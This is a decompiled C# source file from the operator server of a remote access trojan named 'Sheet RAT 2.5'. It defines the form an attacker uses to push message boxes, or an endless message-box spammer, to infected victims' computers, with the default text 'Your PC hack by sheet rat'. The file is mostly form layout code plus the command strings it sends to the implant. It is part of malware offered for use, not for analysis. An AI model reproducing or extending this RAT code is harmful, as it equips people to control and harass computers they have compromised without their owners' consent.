Files
sheet-rat/Server/Server/Forms/FormMessage.cs
T
2026-08-27 11:23:25 -06:00

596 lines
26 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Server.Forms.FormMessage
// Assembly: Server, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 33673F0A-7F43-4A2B-BC08-8E59A15CB7DA
// Assembly location: C:\Users\Admin\Desktop\Sheet RAT 2.5\Server.exe
using MetroFramework;
using MetroFramework.Controls;
using MetroFramework.Forms;
using Server.Connection;
using Server.Helper.Configs.Themes;
using System;
using System.Windows.Forms;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
//#nullable disable
namespace Server.Forms {
public class FormMessage : MetroForm
{
public Clients Parrent;
public Clients Plugin;
private IContainer components;
public MetroComboBox MessageBox_Icon;
private MetroLabel metroLabel1;
private Panel panel1;
public MetroComboBox MessageBox_Button;
private MetroLabel metroLabel2;
private MetroLabel metroLabel3;
private MetroTextBox MessageBox_Handle;
private MetroLabel metroLabel4;
private MetroLabel metroLabel5;
private MetroTextBox MessageBox_Message;
private MetroLabel metroLabel6;
private MetroToggle MessageBox_Spam;
private MetroButton MessageBox_Send;
private Panel panel2;
private MetroLabel metroLabel7;
private MetroToggle metroToggle1;
private MetroButton metroButton1;
private MetroLabel metroLabel8;
private MetroTextBox metroTextBox1;
private MetroLabel metroLabel9;
private MetroTextBox metroTextBox2;
private MetroLabel metroLabel10;
private MetroLabel metroLabel11;
private MetroLabel metroLabel12;
public MetroComboBox metroComboBox1;
public MetroComboBox metroComboBox2;
public MetroLabel MessageBox_Return;
public Timer timer1;
public FormMessage() => this.InitializeComponent();
private void FormMessageBox_Load(object sender, EventArgs e)
{
this.FormClosing += (FormClosingEventHandler) ((t, p) =>
{
if (this.Plugin == null)
return;
this.Plugin.Disconnected();
});
if (Customs.customs.Theme != MetroThemeStyle.Dark)
{
this.Theme = Customs.customs.Theme;
this.metroLabel1.Theme = Customs.customs.Theme;
this.metroLabel2.Theme = Customs.customs.Theme;
this.metroLabel3.Theme = Customs.customs.Theme;
this.metroLabel4.Theme = Customs.customs.Theme;
this.metroLabel5.Theme = Customs.customs.Theme;
this.metroLabel6.Theme = Customs.customs.Theme;
this.metroLabel7.Theme = Customs.customs.Theme;
this.metroLabel8.Theme = Customs.customs.Theme;
this.metroLabel9.Theme = Customs.customs.Theme;
this.metroLabel10.Theme = Customs.customs.Theme;
this.metroLabel11.Theme = Customs.customs.Theme;
this.metroLabel12.Theme = Customs.customs.Theme;
this.MessageBox_Button.Theme = Customs.customs.Theme;
this.MessageBox_Send.Theme = Customs.customs.Theme;
this.MessageBox_Handle.Theme = Customs.customs.Theme;
this.MessageBox_Message.Theme = Customs.customs.Theme;
this.MessageBox_Icon.Theme = Customs.customs.Theme;
this.MessageBox_Spam.Theme = Customs.customs.Theme;
this.MessageBox_Return.Theme = Customs.customs.Theme;
this.panel1.BackColor = Customs.customs.ThemeToColor();
}
if (Customs.customs.Style == MetroColorStyle.Lime)
return;
this.Style = Customs.customs.Style;
this.metroLabel1.Style = Customs.customs.Style;
this.metroLabel2.Style = Customs.customs.Style;
this.metroLabel3.Style = Customs.customs.Style;
this.metroLabel4.Style = Customs.customs.Style;
this.metroLabel5.Style = Customs.customs.Style;
this.metroLabel6.Style = Customs.customs.Style;
this.metroLabel7.Style = Customs.customs.Style;
this.metroLabel8.Style = Customs.customs.Style;
this.metroLabel9.Style = Customs.customs.Style;
this.metroLabel10.Style = Customs.customs.Style;
this.metroLabel11.Style = Customs.customs.Style;
this.metroLabel12.Style = Customs.customs.Style;
this.MessageBox_Button.Style = Customs.customs.Style;
this.MessageBox_Handle.Style = Customs.customs.Style;
this.MessageBox_Message.Style = Customs.customs.Style;
this.MessageBox_Spam.Style = Customs.customs.Style;
this.MessageBox_Icon.Style = Customs.customs.Style;
this.MessageBox_Send.Style = Customs.customs.Style;
this.MessageBox_Return.Style = Customs.customs.Style;
}
private void MessageBox_Send_Click(object sender, EventArgs e)
{
if (this.Plugin == null)
return;
this.Plugin.Send((object) $"MessageBox<@>{this.MessageBox_Message.Text}<@>{this.MessageBox_Handle.Text}<@>{this.MessageBox_Button.SelectedIndex.ToString()}<@>{(this.MessageBox_Icon.SelectedIndex * 16 /*0x10*/).ToString()}");
}
private void MessageBox_Spam_CheckedChanged(object sender, EventArgs e)
{
if (this.Plugin == null)
this.MessageBox_Spam.Checked = false;
if (this.MessageBox_Spam.Checked)
{
Clients plugin = this.Plugin;
string[] strArray = new string[8]
{
"MessageBoxSpammer+<@>",
this.MessageBox_Message.Text,
"<@>",
this.MessageBox_Handle.Text,
"<@>",
null,
null,
null
};
int num = this.MessageBox_Button.SelectedIndex;
strArray[5] = num.ToString();
strArray[6] = "<@>";
num = this.MessageBox_Icon.SelectedIndex * 16 /*0x10*/;
strArray[7] = num.ToString();
string message = string.Concat(strArray);
plugin.Send((object) message);
}
else
this.Plugin.Send((object) "MessageBoxSpammer-");
}
private void timer1_Tick(object sender, EventArgs e)
{
if (this.Plugin.Connect && this.Parrent.Connect)
return;
this.Close();
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (FormMessage));
this.MessageBox_Icon = new MetroComboBox();
this.metroLabel1 = new MetroLabel();
this.panel1 = new Panel();
this.MessageBox_Return = new MetroLabel();
this.metroLabel6 = new MetroLabel();
this.MessageBox_Spam = new MetroToggle();
this.MessageBox_Send = new MetroButton();
this.metroLabel5 = new MetroLabel();
this.MessageBox_Message = new MetroTextBox();
this.metroLabel4 = new MetroLabel();
this.MessageBox_Handle = new MetroTextBox();
this.metroLabel3 = new MetroLabel();
this.metroLabel2 = new MetroLabel();
this.MessageBox_Button = new MetroComboBox();
this.panel2 = new Panel();
this.metroLabel7 = new MetroLabel();
this.metroToggle1 = new MetroToggle();
this.metroButton1 = new MetroButton();
this.metroLabel8 = new MetroLabel();
this.metroTextBox1 = new MetroTextBox();
this.metroLabel9 = new MetroLabel();
this.metroTextBox2 = new MetroTextBox();
this.metroLabel10 = new MetroLabel();
this.metroLabel11 = new MetroLabel();
this.metroLabel12 = new MetroLabel();
this.metroComboBox1 = new MetroComboBox();
this.metroComboBox2 = new MetroComboBox();
this.timer1 = new Timer(this.components);
this.panel1.SuspendLayout();
this.panel2.SuspendLayout();
this.SuspendLayout();
this.MessageBox_Icon.FontSize = MetroComboBoxSize.Small;
this.MessageBox_Icon.FormattingEnabled = true;
this.MessageBox_Icon.ItemHeight = 19;
this.MessageBox_Icon.Items.AddRange(new object[5]
{
(object) "None",
(object) "Error",
(object) "Question",
(object) "Warning",
(object) "Information"
});
this.MessageBox_Icon.Location = new Point(66, 81);
this.MessageBox_Icon.Margin = new Padding(2);
this.MessageBox_Icon.Name = "MessageBox_Icon";
this.MessageBox_Icon.Size = new Size(236, 25);
this.MessageBox_Icon.Style = MetroColorStyle.Lime;
this.MessageBox_Icon.TabIndex = 37;
this.MessageBox_Icon.Theme = MetroThemeStyle.Dark;
this.MessageBox_Icon.UseSelectable = true;
this.MessageBox_Icon.UseStyleColors = true;
this.metroLabel1.AutoSize = true;
this.metroLabel1.Location = new Point(3, 5);
this.metroLabel1.Name = "metroLabel1";
this.metroLabel1.Size = new Size(82, 19);
this.metroLabel1.Style = MetroColorStyle.Lime;
this.metroLabel1.TabIndex = 38;
this.metroLabel1.Text = "MessageBox";
this.metroLabel1.Theme = MetroThemeStyle.Dark;
this.metroLabel1.UseStyleColors = true;
this.panel1.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
this.panel1.Controls.Add((Control) this.MessageBox_Return);
this.panel1.Controls.Add((Control) this.metroLabel6);
this.panel1.Controls.Add((Control) this.MessageBox_Spam);
this.panel1.Controls.Add((Control) this.MessageBox_Send);
this.panel1.Controls.Add((Control) this.metroLabel5);
this.panel1.Controls.Add((Control) this.MessageBox_Message);
this.panel1.Controls.Add((Control) this.metroLabel4);
this.panel1.Controls.Add((Control) this.MessageBox_Handle);
this.panel1.Controls.Add((Control) this.metroLabel3);
this.panel1.Controls.Add((Control) this.metroLabel2);
this.panel1.Controls.Add((Control) this.metroLabel1);
this.panel1.Controls.Add((Control) this.MessageBox_Icon);
this.panel1.Controls.Add((Control) this.MessageBox_Button);
this.panel1.Location = new Point(23, 87);
this.panel1.Name = "panel1";
this.panel1.Size = new Size(416, 260);
this.panel1.TabIndex = 39;
this.MessageBox_Return.AutoSize = true;
this.MessageBox_Return.Location = new Point(237, 5);
this.MessageBox_Return.Name = "MessageBox_Return";
this.MessageBox_Return.Size = new Size(86, 19);
this.MessageBox_Return.Style = MetroColorStyle.Lime;
this.MessageBox_Return.TabIndex = 48 /*0x30*/;
this.MessageBox_Return.Text = "Return: None";
this.MessageBox_Return.Theme = MetroThemeStyle.Dark;
this.MessageBox_Return.UseStyleColors = true;
this.metroLabel6.AutoSize = true;
this.metroLabel6.Location = new Point(313, 183);
this.metroLabel6.Name = "metroLabel6";
this.metroLabel6.Size = new Size(43, 19);
this.metroLabel6.Style = MetroColorStyle.Lime;
this.metroLabel6.TabIndex = 47;
this.metroLabel6.Text = "Spam";
this.metroLabel6.Theme = MetroThemeStyle.Dark;
this.metroLabel6.UseStyleColors = true;
this.MessageBox_Spam.AutoSize = true;
this.MessageBox_Spam.Location = new Point(313, 216);
this.MessageBox_Spam.Name = "MessageBox_Spam";
this.MessageBox_Spam.Size = new Size(80 /*0x50*/, 17);
this.MessageBox_Spam.Style = MetroColorStyle.Lime;
this.MessageBox_Spam.TabIndex = 46;
this.MessageBox_Spam.Text = "Off";
this.MessageBox_Spam.Theme = MetroThemeStyle.Dark;
this.MessageBox_Spam.UseSelectable = true;
this.MessageBox_Spam.UseStyleColors = true;
this.MessageBox_Spam.CheckedChanged += new EventHandler(this.MessageBox_Spam_CheckedChanged);
this.MessageBox_Send.Location = new Point(66, 210);
this.MessageBox_Send.Name = "MessageBox_Send";
this.MessageBox_Send.Size = new Size(105, 23);
this.MessageBox_Send.Style = MetroColorStyle.Lime;
this.MessageBox_Send.TabIndex = 45;
this.MessageBox_Send.Text = "Send";
this.MessageBox_Send.Theme = MetroThemeStyle.Dark;
this.MessageBox_Send.UseSelectable = true;
this.MessageBox_Send.UseStyleColors = true;
this.MessageBox_Send.Click += new EventHandler(this.MessageBox_Send_Click);
this.metroLabel5.AutoSize = true;
this.metroLabel5.Location = new Point(3, 169);
this.metroLabel5.Name = "metroLabel5";
this.metroLabel5.Size = new Size(60, 19);
this.metroLabel5.Style = MetroColorStyle.Lime;
this.metroLabel5.TabIndex = 44;
this.metroLabel5.Text = "Message";
this.metroLabel5.Theme = MetroThemeStyle.Dark;
this.metroLabel5.UseStyleColors = true;
this.MessageBox_Message.CustomButton.Image = (Image) null;
this.MessageBox_Message.CustomButton.Location = new Point(214, 1);
this.MessageBox_Message.CustomButton.Name = "";
this.MessageBox_Message.CustomButton.Size = new Size(21, 21);
this.MessageBox_Message.CustomButton.Style = MetroColorStyle.Blue;
this.MessageBox_Message.CustomButton.TabIndex = 1;
this.MessageBox_Message.CustomButton.Theme = MetroThemeStyle.Light;
this.MessageBox_Message.CustomButton.UseSelectable = true;
this.MessageBox_Message.CustomButton.Visible = false;
this.MessageBox_Message.Lines = new string[1]
{
"Your PC hack by sheet rat"
};
this.MessageBox_Message.Location = new Point(66, 165);
this.MessageBox_Message.MaxLength = (int) short.MaxValue;
this.MessageBox_Message.Name = "MessageBox_Message";
this.MessageBox_Message.PasswordChar = char.MinValue;
this.MessageBox_Message.ScrollBars = ScrollBars.None;
this.MessageBox_Message.SelectedText = "";
this.MessageBox_Message.SelectionLength = 0;
this.MessageBox_Message.SelectionStart = 0;
this.MessageBox_Message.ShortcutsEnabled = true;
this.MessageBox_Message.Size = new Size(236, 23);
this.MessageBox_Message.Style = MetroColorStyle.Lime;
this.MessageBox_Message.TabIndex = 43;
this.MessageBox_Message.Text = "Your PC hack by sheet rat";
this.MessageBox_Message.Theme = MetroThemeStyle.Dark;
this.MessageBox_Message.UseSelectable = true;
this.MessageBox_Message.UseStyleColors = true;
this.MessageBox_Message.WaterMarkColor = Color.FromArgb(109, 109, 109);
this.MessageBox_Message.WaterMarkFont = new Font("Segoe UI", 12f, FontStyle.Italic, GraphicsUnit.Pixel);
this.metroLabel4.AutoSize = true;
this.metroLabel4.Location = new Point(3, 130);
this.metroLabel4.Name = "metroLabel4";
this.metroLabel4.Size = new Size(50, 19);
this.metroLabel4.Style = MetroColorStyle.Lime;
this.metroLabel4.TabIndex = 42;
this.metroLabel4.Text = "Handle";
this.metroLabel4.Theme = MetroThemeStyle.Dark;
this.metroLabel4.UseStyleColors = true;
this.MessageBox_Handle.CustomButton.Image = (Image) null;
this.MessageBox_Handle.CustomButton.Location = new Point(214, 1);
this.MessageBox_Handle.CustomButton.Name = "";
this.MessageBox_Handle.CustomButton.Size = new Size(21, 21);
this.MessageBox_Handle.CustomButton.Style = MetroColorStyle.Blue;
this.MessageBox_Handle.CustomButton.TabIndex = 1;
this.MessageBox_Handle.CustomButton.Theme = MetroThemeStyle.Light;
this.MessageBox_Handle.CustomButton.UseSelectable = true;
this.MessageBox_Handle.CustomButton.Visible = false;
this.MessageBox_Handle.Lines = new string[1]{ "Error" };
this.MessageBox_Handle.Location = new Point(66, 126);
this.MessageBox_Handle.MaxLength = (int) short.MaxValue;
this.MessageBox_Handle.Name = "MessageBox_Handle";
this.MessageBox_Handle.PasswordChar = char.MinValue;
this.MessageBox_Handle.ScrollBars = ScrollBars.None;
this.MessageBox_Handle.SelectedText = "";
this.MessageBox_Handle.SelectionLength = 0;
this.MessageBox_Handle.SelectionStart = 0;
this.MessageBox_Handle.ShortcutsEnabled = true;
this.MessageBox_Handle.Size = new Size(236, 23);
this.MessageBox_Handle.Style = MetroColorStyle.Lime;
this.MessageBox_Handle.TabIndex = 41;
this.MessageBox_Handle.Text = "Error";
this.MessageBox_Handle.Theme = MetroThemeStyle.Dark;
this.MessageBox_Handle.UseSelectable = true;
this.MessageBox_Handle.UseStyleColors = true;
this.MessageBox_Handle.WaterMarkColor = Color.FromArgb(109, 109, 109);
this.MessageBox_Handle.WaterMarkFont = new Font("Segoe UI", 12f, FontStyle.Italic, GraphicsUnit.Pixel);
this.metroLabel3.AutoSize = true;
this.metroLabel3.Location = new Point(3, 87);
this.metroLabel3.Name = "metroLabel3";
this.metroLabel3.Size = new Size(33, 19);
this.metroLabel3.Style = MetroColorStyle.Lime;
this.metroLabel3.TabIndex = 40;
this.metroLabel3.Text = "Icon";
this.metroLabel3.Theme = MetroThemeStyle.Dark;
this.metroLabel3.UseStyleColors = true;
this.metroLabel2.AutoSize = true;
this.metroLabel2.Location = new Point(3, 40);
this.metroLabel2.Name = "metroLabel2";
this.metroLabel2.Size = new Size(47, 19);
this.metroLabel2.Style = MetroColorStyle.Lime;
this.metroLabel2.TabIndex = 39;
this.metroLabel2.Text = "Button";
this.metroLabel2.Theme = MetroThemeStyle.Dark;
this.metroLabel2.UseStyleColors = true;
this.MessageBox_Button.FontSize = MetroComboBoxSize.Small;
this.MessageBox_Button.FormattingEnabled = true;
this.MessageBox_Button.ItemHeight = 19;
this.MessageBox_Button.Items.AddRange(new object[6]
{
(object) "OK",
(object) "OKCancel",
(object) "AbortRetryIgnore",
(object) "YesNoCancel",
(object) "YesNo",
(object) "RetryCancel"
});
this.MessageBox_Button.Location = new Point(66, 40);
this.MessageBox_Button.Margin = new Padding(2);
this.MessageBox_Button.Name = "MessageBox_Button";
this.MessageBox_Button.Size = new Size(236, 25);
this.MessageBox_Button.Style = MetroColorStyle.Lime;
this.MessageBox_Button.TabIndex = 37;
this.MessageBox_Button.Theme = MetroThemeStyle.Dark;
this.MessageBox_Button.UseSelectable = true;
this.MessageBox_Button.UseStyleColors = true;
this.panel2.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
this.panel2.Controls.Add((Control) this.metroLabel7);
this.panel2.Controls.Add((Control) this.metroToggle1);
this.panel2.Controls.Add((Control) this.metroButton1);
this.panel2.Controls.Add((Control) this.metroLabel8);
this.panel2.Controls.Add((Control) this.metroTextBox1);
this.panel2.Controls.Add((Control) this.metroLabel9);
this.panel2.Controls.Add((Control) this.metroTextBox2);
this.panel2.Controls.Add((Control) this.metroLabel10);
this.panel2.Controls.Add((Control) this.metroLabel11);
this.panel2.Controls.Add((Control) this.metroLabel12);
this.panel2.Controls.Add((Control) this.metroComboBox1);
this.panel2.Controls.Add((Control) this.metroComboBox2);
this.panel2.Location = new Point(468, 87);
this.panel2.Name = "panel2";
this.panel2.Size = new Size(416, 260);
this.panel2.TabIndex = 48 /*0x30*/;
this.panel2.Visible = false;
this.metroLabel7.AutoSize = true;
this.metroLabel7.Location = new Point(313, 183);
this.metroLabel7.Name = "metroLabel7";
this.metroLabel7.Size = new Size(43, 19);
this.metroLabel7.Style = MetroColorStyle.Lime;
this.metroLabel7.TabIndex = 47;
this.metroLabel7.Text = "Spam";
this.metroLabel7.Theme = MetroThemeStyle.Dark;
this.metroLabel7.UseStyleColors = true;
this.metroToggle1.AutoSize = true;
this.metroToggle1.Location = new Point(313, 216);
this.metroToggle1.Name = "metroToggle1";
this.metroToggle1.Size = new Size(80 /*0x50*/, 17);
this.metroToggle1.Style = MetroColorStyle.Lime;
this.metroToggle1.TabIndex = 46;
this.metroToggle1.Text = "Off";
this.metroToggle1.Theme = MetroThemeStyle.Dark;
this.metroToggle1.UseSelectable = true;
this.metroToggle1.UseStyleColors = true;
this.metroButton1.Location = new Point(66, 210);
this.metroButton1.Name = "metroButton1";
this.metroButton1.Size = new Size(105, 23);
this.metroButton1.Style = MetroColorStyle.Lime;
this.metroButton1.TabIndex = 45;
this.metroButton1.Text = "Send";
this.metroButton1.Theme = MetroThemeStyle.Dark;
this.metroButton1.UseSelectable = true;
this.metroButton1.UseStyleColors = true;
this.metroLabel8.AutoSize = true;
this.metroLabel8.Location = new Point(3, 169);
this.metroLabel8.Name = "metroLabel8";
this.metroLabel8.Size = new Size(60, 19);
this.metroLabel8.Style = MetroColorStyle.Lime;
this.metroLabel8.TabIndex = 44;
this.metroLabel8.Text = "Message";
this.metroLabel8.Theme = MetroThemeStyle.Dark;
this.metroLabel8.UseStyleColors = true;
this.metroTextBox1.CustomButton.Image = (Image) null;
this.metroTextBox1.CustomButton.Location = new Point(214, 1);
this.metroTextBox1.CustomButton.Name = "";
this.metroTextBox1.CustomButton.Size = new Size(21, 21);
this.metroTextBox1.CustomButton.Style = MetroColorStyle.Blue;
this.metroTextBox1.CustomButton.TabIndex = 1;
this.metroTextBox1.CustomButton.Theme = MetroThemeStyle.Light;
this.metroTextBox1.CustomButton.UseSelectable = true;
this.metroTextBox1.CustomButton.Visible = false;
this.metroTextBox1.Lines = new string[1]
{
"Your PC hack by sheet rat"
};
this.metroTextBox1.Location = new Point(66, 165);
this.metroTextBox1.MaxLength = (int) short.MaxValue;
this.metroTextBox1.Name = "metroTextBox1";
this.metroTextBox1.PasswordChar = char.MinValue;
this.metroTextBox1.ScrollBars = ScrollBars.None;
this.metroTextBox1.SelectedText = "";
this.metroTextBox1.SelectionLength = 0;
this.metroTextBox1.SelectionStart = 0;
this.metroTextBox1.ShortcutsEnabled = true;
this.metroTextBox1.Size = new Size(236, 23);
this.metroTextBox1.Style = MetroColorStyle.Lime;
this.metroTextBox1.TabIndex = 43;
this.metroTextBox1.Text = "Your PC hack by sheet rat";
this.metroTextBox1.Theme = MetroThemeStyle.Dark;
this.metroTextBox1.UseSelectable = true;
this.metroTextBox1.UseStyleColors = true;
this.metroTextBox1.WaterMarkColor = Color.FromArgb(109, 109, 109);
this.metroTextBox1.WaterMarkFont = new Font("Segoe UI", 12f, FontStyle.Italic, GraphicsUnit.Pixel);
this.metroLabel9.AutoSize = true;
this.metroLabel9.Location = new Point(3, 130);
this.metroLabel9.Name = "metroLabel9";
this.metroLabel9.Size = new Size(50, 19);
this.metroLabel9.Style = MetroColorStyle.Lime;
this.metroLabel9.TabIndex = 42;
this.metroLabel9.Text = "Handle";
this.metroLabel9.Theme = MetroThemeStyle.Dark;
this.metroLabel9.UseStyleColors = true;
this.metroTextBox2.CustomButton.Image = (Image) null;
this.metroTextBox2.CustomButton.Location = new Point(214, 1);
this.metroTextBox2.CustomButton.Name = "";
this.metroTextBox2.CustomButton.Size = new Size(21, 21);
this.metroTextBox2.CustomButton.Style = MetroColorStyle.Blue;
this.metroTextBox2.CustomButton.TabIndex = 1;
this.metroTextBox2.CustomButton.Theme = MetroThemeStyle.Light;
this.metroTextBox2.CustomButton.UseSelectable = true;
this.metroTextBox2.CustomButton.Visible = false;
this.metroTextBox2.Lines = new string[1]{ "Error" };
this.metroTextBox2.Location = new Point(66, 126);
this.metroTextBox2.MaxLength = (int) short.MaxValue;
this.metroTextBox2.Name = "metroTextBox2";
this.metroTextBox2.PasswordChar = char.MinValue;
this.metroTextBox2.ScrollBars = ScrollBars.None;
this.metroTextBox2.SelectedText = "";
this.metroTextBox2.SelectionLength = 0;
this.metroTextBox2.SelectionStart = 0;
this.metroTextBox2.ShortcutsEnabled = true;
this.metroTextBox2.Size = new Size(236, 23);
this.metroTextBox2.Style = MetroColorStyle.Lime;
this.metroTextBox2.TabIndex = 41;
this.metroTextBox2.Text = "Error";
this.metroTextBox2.Theme = MetroThemeStyle.Dark;
this.metroTextBox2.UseSelectable = true;
this.metroTextBox2.UseStyleColors = true;
this.metroTextBox2.WaterMarkColor = Color.FromArgb(109, 109, 109);
this.metroTextBox2.WaterMarkFont = new Font("Segoe UI", 12f, FontStyle.Italic, GraphicsUnit.Pixel);
this.metroLabel10.AutoSize = true;
this.metroLabel10.Location = new Point(3, 87);
this.metroLabel10.Name = "metroLabel10";
this.metroLabel10.Size = new Size(33, 19);
this.metroLabel10.Style = MetroColorStyle.Lime;
this.metroLabel10.TabIndex = 40;
this.metroLabel10.Text = "Icon";
this.metroLabel10.Theme = MetroThemeStyle.Dark;
this.metroLabel10.UseStyleColors = true;
this.metroLabel11.AutoSize = true;
this.metroLabel11.Location = new Point(3, 40);
this.metroLabel11.Name = "metroLabel11";
this.metroLabel11.Size = new Size(47, 19);
this.metroLabel11.Style = MetroColorStyle.Lime;
this.metroLabel11.TabIndex = 39;
this.metroLabel11.Text = "Button";
this.metroLabel11.Theme = MetroThemeStyle.Dark;
this.metroLabel11.UseStyleColors = true;
this.metroLabel12.AutoSize = true;
this.metroLabel12.Location = new Point(3, 5);
this.metroLabel12.Name = "metroLabel12";
this.metroLabel12.Size = new Size(104, 19);
this.metroLabel12.Style = MetroColorStyle.Lime;
this.metroLabel12.TabIndex = 38;
this.metroLabel12.Text = "Notification Icon";
this.metroLabel12.Theme = MetroThemeStyle.Dark;
this.metroLabel12.UseStyleColors = true;
this.metroComboBox1.FontSize = MetroComboBoxSize.Small;
this.metroComboBox1.FormattingEnabled = true;
this.metroComboBox1.ItemHeight = 19;
this.metroComboBox1.Location = new Point(66, 81);
this.metroComboBox1.Margin = new Padding(2);
this.metroComboBox1.Name = "metroComboBox1";
this.metroComboBox1.Size = new Size(236, 25);
this.metroComboBox1.Style = MetroColorStyle.Lime;
this.metroComboBox1.TabIndex = 37;
this.metroComboBox1.Theme = MetroThemeStyle.Dark;
this.metroComboBox1.UseSelectable = true;
this.metroComboBox1.UseStyleColors = true;
this.metroComboBox2.FontSize = MetroComboBoxSize.Small;
this.metroComboBox2.FormattingEnabled = true;
this.metroComboBox2.ItemHeight = 19;
this.metroComboBox2.Location = new Point(66, 40);
this.metroComboBox2.Margin = new Padding(2);
this.metroComboBox2.Name = "metroComboBox2";
this.metroComboBox2.Size = new Size(236, 25);
this.metroComboBox2.Style = MetroColorStyle.Lime;
this.metroComboBox2.TabIndex = 37;
this.metroComboBox2.Theme = MetroThemeStyle.Dark;
this.metroComboBox2.UseSelectable = true;
this.metroComboBox2.UseStyleColors = true;
this.timer1.Interval = 5000;
this.timer1.Tick += new EventHandler(this.timer1_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(470, 379);
this.Controls.Add((Control) this.panel2);
this.Controls.Add((Control) this.panel1);
this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");
this.Name = nameof (FormMessage);
this.Style = MetroColorStyle.Lime;
this.Text = "Message";
this.Theme = MetroThemeStyle.Dark;
this.Load += new EventHandler(this.FormMessageBox_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.panel2.ResumeLayout(false);
this.panel2.PerformLayout();
this.ResumeLayout(false);
}
}
}